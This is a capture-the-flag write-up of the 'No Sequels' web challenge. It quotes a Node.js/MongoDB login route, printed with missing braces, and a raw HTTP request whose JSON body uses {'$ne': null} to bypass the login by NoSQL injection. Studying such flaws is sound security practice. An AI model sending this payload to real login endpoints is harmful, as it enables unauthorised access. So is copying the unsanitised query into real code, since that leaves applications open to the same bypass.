Tags: nosql-injection web 


# ▼▼▼No Sequels(Web:50pts、solved:312/1374=22.7%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

The prequels sucked, and the sequels aren't much better, but at least we always have the original trilogy.

Author: SirIan

Hint: MongoDB is a safer alternative to SQL, right?


## 【source code】

app.use(bodyParser.urlencoded({ extended: false }));


router.post('/login', verifyJwt, function (req, res) {
// monk instance
var db = req.db;

var user = req.body.username;
var pass = req.body.password;

if (!user || !pass){
res.send("One or more fields were not provided.");
var query = {
username: user,
password: pass

db.collection('users').findOne(query, function (err, user) {
if (!user){
res.send("Wrong username or password");

res.cookie('token', jwt.sign({name: user.username, authenticated: true}, secret));


## 【understanding functions】

・Login function exists


## 【exploit】

From the title, I think NoSQL injection

**Node.js** can also receive parameters in JSON format, so send the following **request converted to JSON format**

POST /login HTTP/1.1
Host: nosequels.2019.chall.actf.co
Content-Length: 67
Content-Type: application/json
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1ODA0Nzc5fQ.N1GQCY5ZtBNZD-O9CK7nImn_jQjCqGdbE-46U4nDLQE

"username": {"$ne": null},
"password": {"$ne": null}